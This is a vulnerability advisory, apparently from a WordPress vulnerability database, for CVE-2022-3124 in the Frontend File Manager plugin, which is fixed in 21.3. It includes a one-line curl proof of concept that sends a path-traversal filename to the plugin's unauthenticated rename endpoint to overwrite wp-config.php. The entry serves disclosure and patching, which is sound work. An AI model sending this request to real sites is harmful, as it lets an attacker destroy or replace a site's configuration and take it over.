Frontend File Manager < 21.3 – Unauthenticated File Renaming | CVE 2022-3124 | Plugin Vulnerabilities

Description

The plugin allows any unauthenticated user to rename uploaded files from users. Furthermore, due to the lack of validation in the destination filename, this could allow allow them to change the content of arbitrary files on the web server

Proof of Concept

curl -i -s -k -X 'POST' --data-binary 'fileid=45&filename=../../../wp-config.php' 'https://example.com/wp-json/wpfm/v1/file-rename'

This will replace the wp-config.php file with the content of the uploaded file with ID 45

Affects Plugins

nmedia-user-file-uploader

Fixed in 21.3

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter

Verified

Yes

WPVDB ID

00f76765-95af-4dbc-8c37-f1b15a0e8608

Timeline

Publicly Published

2022-09-07 (about 1 years ago)

Added

2022-09-07 (about 1 years ago)

Last Updated

2022-09-07 (about 1 years ago)

Other

Published

Title

Published

2023-03-13

Title

Stock Ticker < 3.23.1 - Missing Authorization in AJAX Actions

Published

2023-10-19

Title

Just Custom Fields <= 3.3.2 - Cross-Site Request Forgery on AJAX Actions

Published

2022-10-19

Title

reSmush.it Image Optimizer < 0.4.4 - Subscriber+ AJAX Calls

Published

2024-01-05

Title

ActivityPub for WordPress < 1.0.6 - Unauthenticated REST API Access

Published

2022-11-21

Title

Betheme < 26.6.3 - Missing Authorization